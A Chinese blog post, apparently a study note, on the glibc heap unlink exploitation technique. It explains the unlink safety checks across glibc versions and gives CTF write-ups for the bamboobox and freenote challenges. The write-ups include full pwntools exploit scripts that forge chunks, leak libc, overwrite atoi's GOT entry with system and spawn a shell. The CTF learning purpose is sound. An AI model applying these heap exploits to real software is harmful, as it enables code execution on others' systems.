Unlink

本文参考了CTF-wiki 和glibc 源码

原理:

我们在利用 unlink 所造成的漏洞时,其实就是借助 unlink 操作来达成修改指针的效果。

我们先来简单回顾一下 unlink 的目的与过程,其目的是把一个双向链表中的空闲块拿出来,然后和前后物理相邻的 free chunk 进行合并。其基本的过程如下

类似于我们学数据结构时学的从双向链表中删除一个节点的操作。

古老的 unlink

在最初 unlink 实现的时候,其实是没有对双向链表检查的,也就是说,没有以下的代码

//检查p的 size 是否等于物理相邻的后一个chunk的 pre_size
if (chunksize (p) != prev_size (next_chunk (p)))
malloc_printerr ("corrupted size vs. prev_size"); //检查p和其前后的chunk是否构成双向链表
if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
malloc_printerr ("corrupted double-linked list"); //只有large bin 才进行次检查
//检查p和其前后的large chunk的nextsize域是否构成双向链表
if (p->fd_nextsize->bk_nextsize != p
|| p->bk_nextsize->fd_nextsize != p)
malloc_printerr ("corrupted double-linked list (not small)");

这里我们以 32 位为例,假设堆内存最初的布局是下面的样子

如果我们通过某种方式(比如溢出)将 nextchunk 的 fd 和 bk 指针修改为指定的值。则当我们free(Q)时

  1. glibc 判断这个块是 small chunk。
  2. 判断前向合并,发现前一个 chunk 处于使用状态,不需要前向合并。
  3. 判断后向合并,发现后一个 chunk 处于空闲状态,需要合并。
  4. 继而对 nextchunk 采取 unlink 操作。

那么 unlink 具体执行的效果是什么样子呢?我们用P来表示当前的chunk(也就是先被free的chunk),可以来分析一下

  • FD=P->fd = target addr -12
  • BK=P->bk = expect value
  • FD->bk = BK,即 *(target addr-12+12) = expect value
  • BK->fd = FD,即*(expect value +8) = target addr-12

看起来我们似乎可以通过 unlink 直接实现任意地址写入的目的,但是我们还是需要确保 expect value +8 地址具有可写的权限。

比如说我们将 target addr 设置为某个 got 表项,那么当程序调用对应的 libc 函数时,就会直接执行我们设置的值(expect value)处的代码。需要注意的是,expect value+8 处的值可能没有写入权限,执行BK->fd = FD回报错,需要想办法绕过。

当前的 unlink

我们刚才考虑的是没有检查的情况,但是一旦加上检查,就没有这么简单了。我们看一下对 fd 和 bk 的检查

//检查p和其前后的chunk是否构成双向链表
if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
malloc_printerr ("corrupted double-linked list");

此时

  • FD->bk = *(target addr - 12 +12)=*(target_addr) != p
  • BK->fd = *(expect value + 8) != p

那么我们上面所利用的修改 GOT 表项的方法就可能不可用了。

但是,如果我们使得 expect value+8 以及 target_addr 等于 p,那么我们就可以执行

  • expect value = p - 8

  • target addr = p

  • FD->bk = BK,即 *(p-12+12) = *p =p-8

  • BK->fd = FD,即 *(p-8 +8) = *p = p-12

这样可以通过检查,即改写了指针 p 的内容,将其指向了比自己低 12 的地址处。

此外,其实如果我们设置next chunk 的 fd 和 bk 均为 nextchunk 的地址也是可以绕过上面的检测的。但是这样的话,并不能达到修改指针内容的效果。

  • FD = p->fd = p

  • BK = p->bk = p

  • FD->bk = *(p +12) = p

  • BK->fd = *(p + 8) = p

不同版本的unlink对比

glib 2.23

/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) {
FD = P->fd;
BK = P->bk;
//检查p和其前后的chunk是否构成双向链表
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
malloc_printerr (check_action, "corrupted double-linked list", P, AV);
else
{
FD->bk = BK;
BK->fd = FD;
//一般的unlink到这里就结束了,只有是large bin范围,才继续执行下面的代码。
//如果 p 在largebin的范围 且 p->fd_nextsize不为空
if (!in_smallbin_range (P->size) && __builtin_expect (P->fd_nextsize != NULL, 0))
{
//检查p和其前后的large chunk的nextsize域是否构成双向链表
if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0) || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))
malloc_printerr (check_action,"corrupted double-linked list (not small)",P, AV); if (FD->fd_nextsize == NULL) {
if (P->fd_nextsize == P)
FD->fd_nextsize = FD->bk_nextsize = FD;
else
{
FD->fd_nextsize = P->fd_nextsize;
FD->bk_nextsize = P->bk_nextsize;
P->fd_nextsize->bk_nextsize = FD;
P->bk_nextsize->fd_nextsize = FD;
}
}
else
{
P->fd_nextsize->bk_nextsize = P->bk_nextsize;
P->bk_nextsize->fd_nextsize = P->fd_nextsize;
}
}
}
}

glibc 2.27

#define unlink(AV, P, BK, FD)
{
//检查p的 size 是否等于物理相邻的后一个chunk的 pre_size
if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))
malloc_printerr ("corrupted size vs. prev_size"); FD = P->fd;
BK = P->bk; if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
malloc_printerr ("corrupted double-linked list"); else
{
FD->bk = BK;
BK->fd = FD; if (!in_smallbin_range (chunksize_nomask (P)) && __builtin_expect (P->fd_nextsize != NULL, 0))
{
if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))
malloc_printerr ("corrupted double-linked list (not small)"); if (FD->fd_nextsize == NULL)
{
if (P->fd_nextsize == P)
FD->fd_nextsize = FD->bk_nextsize = FD;
else
{
FD->fd_nextsize = P->fd_nextsize;
FD->bk_nextsize = P->bk_nextsize;
P->fd_nextsize->bk_nextsize = FD;
P->bk_nextsize->fd_nextsize = FD;
}
}
else
{
P->fd_nextsize->bk_nextsize = P->bk_nextsize;
P->bk_nextsize->fd_nextsize = P->fd_nextsize;
}
}
}
}

glibc 2.29

static void unlink_chunk (mstate av, mchunkptr p)
{ if (chunksize (p) != prev_size (next_chunk (p)))
malloc_printerr ("corrupted size vs. prev_size"); mchunkptr fd = p->fd;
mchunkptr bk = p->bk; if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
malloc_printerr ("corrupted double-linked list"); fd->bk = bk;
bk->fd = fd; if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
{
if (p->fd_nextsize->bk_nextsize != p || p->bk_nextsize->fd_nextsize != p)
malloc_printerr ("corrupted double-linked list (not small)"); if (fd->fd_nextsize == NULL)
{
if (p->fd_nextsize == p)
fd->fd_nextsize = fd->bk_nextsize = fd;
else
{
fd->fd_nextsize = p->fd_nextsize;
fd->bk_nextsize = p->bk_nextsize;
p->fd_nextsize->bk_nextsize = fd;
p->bk_nextsize->fd_nextsize = fd;
}
}
else
{
p->fd_nextsize->bk_nextsize = p->bk_nextsize;
p->bk_nextsize->fd_nextsize = p->fd_nextsize;
}
}
}

glibc 2.23

  1. 检查p和其前后的chunk是否构成双向链表

  2. 检查p和其前后的large chunk的nextsize域是否构成双向链表

glibc 2.27 2.29 新增加一下保护

  1. 检查p的 size 是否等于物理相邻的后一个chunk的 pre_size

为了加深印象,我们做几道题目

例子

hitcontraining_unlink

本题的环境是ubuntu 16,也就是说glibc版本为2.23

首先检查一下保护

增删改查,典型的堆题

IDA 分析

main函数,申请了一块空间,存了2个函数指针,分别是hello_message和goodbye_message

add存在off_by_null漏洞

edit 没有对输入的length做检查,导致堆溢出

delete 没有漏洞

show 展示所有item的内容

这里还有个后门?

初步分析这题目存在堆溢出,我们可以修改fd,bk的值。我们可以想到的是使用fastbin attack 但是为了练习unlink,我们这里使用unlink攻击

  1. fastbin attack利用后门
add(0x21,'AAAAA')#0  为了溢出修改1
add(0x18,'BBBBB')#1
add(0x18,'CCCC') #2
delete(2)
delete(1) #fastbin -> 1 -> 2 payload = 'A'*0x28+p64(0x21) #修改1的fd指针,指向main开始时申请的内存地址
edit(0,len(payload),payload)
add(0x18,'AAA')
backdoor = 0x0400D49
add(0x18,p64(0)+p64(backdoor)) #将其第二个指针修改为backdoor的地址.
p.sendlineafter('Your choice:','5')
  1. fastbin attack(house of force)劫持atoi_got

    add(0x21,'AAAAA')#0 为了溢出修改1
    add(0x18,'BBBBB')#1
    delete(1) #fastbin -> 1 payload = 'A'*0x28+p64(0x21)+p64(0x06020C0 - 0x8)
    edit(0,len(payload),payload) #fastbin -> 1 -> itemlist-8
    add(0x18,'AAA') add(0x18,p64(elf.got['atoi'])) #修改itemlist[0]->ptr 指针指向atoi_got
    show() #泄漏libc地址
    p.recvuntil('0 : ')
    atoi = u64(p.recv(6).ljust(8,'\x00'))
    libc_base = atoi - libc.symbols['atoi']
    system = libc_base + libc.symbols['system']
    edit(0,8,p64(system))#往atoi_got写入system地址
    p.sendlineafter('Your choice:','/bin/sh\x00')
  2. unlink

    #coding:utf-8
    from pwn import *
    context.log_level = 'debug'
    p = process('./bamboobox')
    elf = ELF('./bamboobox')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') def add(size,content):
    p.sendlineafter('Your choice:','2')
    p.sendlineafter('name:',str(size))
    p.sendafter('item:',content) def show():
    p.sendlineafter('Your choice:','1') def edit(idx,size,content):
    p.sendlineafter('Your choice:','3')
    p.sendafter('item:',str(idx))
    p.sendlineafter('name:',str(size))
    p.sendafter('item:',content) def delete(idx):
    p.sendlineafter('Your choice:','4')
    p.sendafter('item:',str(idx)) itemlist0_ptr = 0x6020C0+8 add(0x40,'A' * 8)#0
    add(0x80,'B' * 8)#1
    add(0x80,'C' * 8)#2 #这里我们绕过第一个检查 (检查p和其前后的chunk是否构成双向链表)
    fake_chunk = p64(0) + p64(0x41) #fake_chunk header
    fake_chunk += p64(itemlist0_ptr-0x18) + p64(itemlist0_ptr-0x10) #fake_chunk fd bk
    fake_chunk += 'C'*0x20
    fake_chunk += p64(0x40) # 1的presize
    fake_chunk += p64(0x90) # 1的size
    edit(0,0x80,fake_chunk) '''
    这里用p指代itemlist0_ptr
    FD = p -> fd = p - 0x18
    BK = p -> bk = p - 0x10 FD -> bk = p
    BK -> fd = p
    #通过检查
    FD -> bk = BK 相当于 *(p) = p-0x10
    BK -> fd = FD 相当于 *(p) = p-0x18
    我们把p的值改为了p的地址-0x18,使得p的值不再是堆的地址,而是itemlist附近的地址。
    '''
    delete(1) #前向合并,合并0中的fake_chunk 放入 unsorted bin 中 ,同时 itemlist0_ptr = &itemlist0_ptr -0x18 payload = p64(0) * 2
    payload += p64(0x40) + p64(elf.got['atoi']) #覆盖的itemlist[0]->ptr 为atoi_got
    edit(0,0x80,payload) show()
    p.recvuntil('0 : ')
    atoi = u64(p.recv(6).ljust(8,'\x00'))
    libc_base = atoi - libc.symbols['atoi']
    system = libc_base + libc.symbols['system']
    edit(0,8,p64(system))
    p.sendlineafter('Your choice:','/bin/sh\x00') p.interactive()

jarvisoj_level6_x64

首先检查保护

IDA分析

首先程序先malloc了一块地址,把一开始的地方填入0x100,0,剩下的全部清零

增删改查,典型的堆题

add函数,申请0x80字节大小对齐的堆块,然后在heaparray中做相应的记录

edit函数,如果输入的size与heaparray中记录的不同,这调用realloc函数。

show 没啥好说,就是heaparray中每个记录项打印出来

free函数,存在double free的漏洞,因为没有清零,且没有对heaparray中的inuse进行校验。

#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process('./freenote_x64')
elf = ELF('./freenote_x64')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') def add(size,content):
p.sendlineafter('Your choice: ','2')
p.sendlineafter('note: ',str(size))
p.sendafter('note: ',content) def show():
p.sendlineafter('Your choice: ','1') def edit(idx,size,content):
p.sendlineafter('Your choice: ','3')
p.sendlineafter('number: ',str(idx))
p.sendlineafter('note: ',str(size))
p.sendafter('note: ',content) def delete(idx):
p.sendlineafter('Your choice: ','4')
p.sendlineafter('number: ',str(idx)) #----------leak heap and libc --------------#
add(0x80,'A'*0x80)#
add(0x80,'B'*0x80)#1
add(0x80,'C'*0x80)#
add(0x80,'D'*0x80)#3 delete(0)
delete(2) #在unsorted bin中形成双向链表 add(0x8,'A'*0x8)#0
add(0x8,'C'*0x8)#2 show()
p.recvuntil('AAAAAAAA')
heap = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00'))-0x1940
print 'heap: '+hex(heap) p.recvuntil('CCCCCCCC')
libc_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00'))-0x3c4b78
print 'libc_base: '+hex(libc_base)
#------------------unlink---------------------------------#
delete(0)
delete(1) #合并0,1块 chunk0_ptr = heap + 0x30 payload = p64(0)+p64(0x81)
payload += p64(chunk0_ptr-0x18)+p64(chunk0_ptr-0x10)
payload = payload.ljust(0x80,'\x00')
payload += p64(0x80)+p64(0x90)
payload = payload.ljust(0x100,'\x00')
add(0x100,payload)
delete(1) #double free 触发unlink #----------------改写 atoi_got -----------------#
payload = p64(0x2)+p64(0x1)+p64(0x8)+p64(elf.got['atoi'])
payload = payload.ljust(0x100,'\x00')
edit(0,0x100,payload)#改写heaparray[0]-> ptr 使其指向atoi_got edit(0,0x8,p64(libc_base + libc.symbols['system']))#改写atoi_got为system的值 p.sendlineafter('Your choice: ','/bin/sh\x00') p.interactive()

Unlink学习总结的更多相关文章

  1. ucos实时操作系统学习笔记——任务间通信(信号量)

    ucos实时操作系统的任务间通信有好多种,本人主要学习了sem, mutex, queue, messagebox这四种.系统内核代码中,这几种任务间通信机制的实现机制相似,接下来记录一下本人对核心代 ...

  2. Linux堆溢出漏洞利用之unlink

    Linux堆溢出漏洞利用之unlink 作者:走位@阿里聚安全 0 前言 之前我们深入了解了glibc malloc的运行机制(文章链接请看文末▼),下面就让我们开始真正的堆溢出漏洞利用学习吧.说实话 ...

  3. nodejs的第四天学习笔记

    一. ECMAScript6(es2015)es6语法 es6/es2015,在es5的基础上扩展了很多新的功能,我们要学习仅仅是es6中的部分常用新功能,这些功能在使用的时候一定要慎重,因为他们之中 ...

  4. 两千行PHP学习笔记

    亲们,如约而至的PHP笔记来啦~绝对干货! 以下为我以前学PHP时做的笔记,时不时的也会添加一些基础知识点进去,有时还翻出来查查. MySQL笔记:一千行MySQL学习笔记http://www.cnb ...

  5. 测试Flask应用_学习笔记

    源代码尽在我的github上面:https://github.com/521xueweihan 欢迎大家交流学习 """ setUp() 方法中会创建一个新的测试客户端并 ...

  6. linux内核数据结构学习总结

    目录 . 进程相关数据结构 ) struct task_struct ) struct cred ) struct pid_link ) struct pid ) struct signal_stru ...

  7. squid 学习笔记

    Squid学习笔记 1.安装前的配置 编译安装之前需要校正的参数主要包括File Descriptor和Mbuf Clusters. 1.File Descriptor 查看文件描述符的限制数目: u ...

  8. apue第四章学习总结

    apue第四章学习总结 4.1.若以stat函数去替换lstat函数,会发生: 原来的目录路径: $:~/workspace/apue2/include$ ls -l apue.h abc lrwxr ...

  9. PHP 开发 APP 接口 学习笔记与总结 - APP 接口实例 [3] 首页 APP 接口开发方案 ② 读取缓存方式

    以静态缓存为例. 修改 file.php line:11 去掉 path 参数(方便),加上缓存时间参数: public function cacheData($k,$v = '',$cacheTim ...

随机推荐

  1. 统一数据管理工具 —— CloudQuery v1.3.3 上线!

    前言 岁末临近,让我们跟随着新春的脚步,一起去看看 CloudQuery 今年最后一次更新吧! 新增功能 一.Oracle - 查看表结构 Oracle 数据源中,可查看各表结构信息(列详情和表注释等 ...

  2. django学习-1.开始hello world!

    1.前言 当你想走上测试开发之路,用python开发出一个web页面的时候,需要找一个支持python语言的web框架.django框架有丰富的文档和学习资料,也是非常成熟的web开发框架,想学pyt ...

  3. Pandas初体验

    目录 Pandas 一.简介 1.安装 2.引用方法 二.series 1.创建方法 2.缺失数据处理 2.1 什么是缺失值 2.2 NaN特性 2.3 填充NaN 2.4 删除NaN 2.5 其他方 ...

  4. Vue框架简介及简单使用

    目录 一.前端框架介绍 二.vue框架简介 三.vue使用初体验 1. vue如何在页面中引入 2. 插值表达式 3. 文本指令 4. 方法指令(事件指令) 5. 属性指令 四.js数据类型补充 1. ...

  5. Gradle 差异化构建

    Compile 默认的依赖方式,任何情况下都会依赖. Provided 只提供编译时依赖,打包时不会添加进去. Apk 只在打包Apk包时依赖,这个应该是比较少用到的. TestCompile 只在测 ...

  6. 第41天学习打卡(死锁 Lock synchronized与Lock的对比 线程协作 使用线程池)

    死锁 多个线程各自占有一些共享资源,并且互相等待其他线程占有的资源才能运行,而导致两个或者多个线程都在等待对方释放资源,都停止执行的情形.某一个同步块同时拥有"两个以上对象的锁"时 ...

  7. 使paramiko库执行命令时,在给定的时间强制退出

    原因: 使用paramiko库ssh连接到远端云主机上时,非常偶现卡死现象,连接无法退出(可以是执行命令时云主机重启等造成).需要给定一段时间,不管命令执行是否卡住,都退出连接,显示命令执行超时错误. ...

  8. MySQL提权 通过UDF

    目录 UDF是什么 命令执行 文本写入 Example: 远程写入 反弹Shell 提权 UDF是什么 参考:https://www.cnblogs.com/litlife/p/9030673.htm ...

  9. 网络好不好,ping一下就知道

    摘要:在测试和部署网络通信应用时,我们经常会遇到网络不通的问题,一般都会想到ping一下.本文将带您了解ping命令的作用和原理~ 在测试和部署网络通信应用时,我们经常会遇到网络不通的问题.一般都会想 ...

  10. CVE-2019-2618 任意文件上传

    漏洞描述:CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口,该接口支持向服务器上传任意文件.攻击者突破了OAM(Oracle Access Ma ...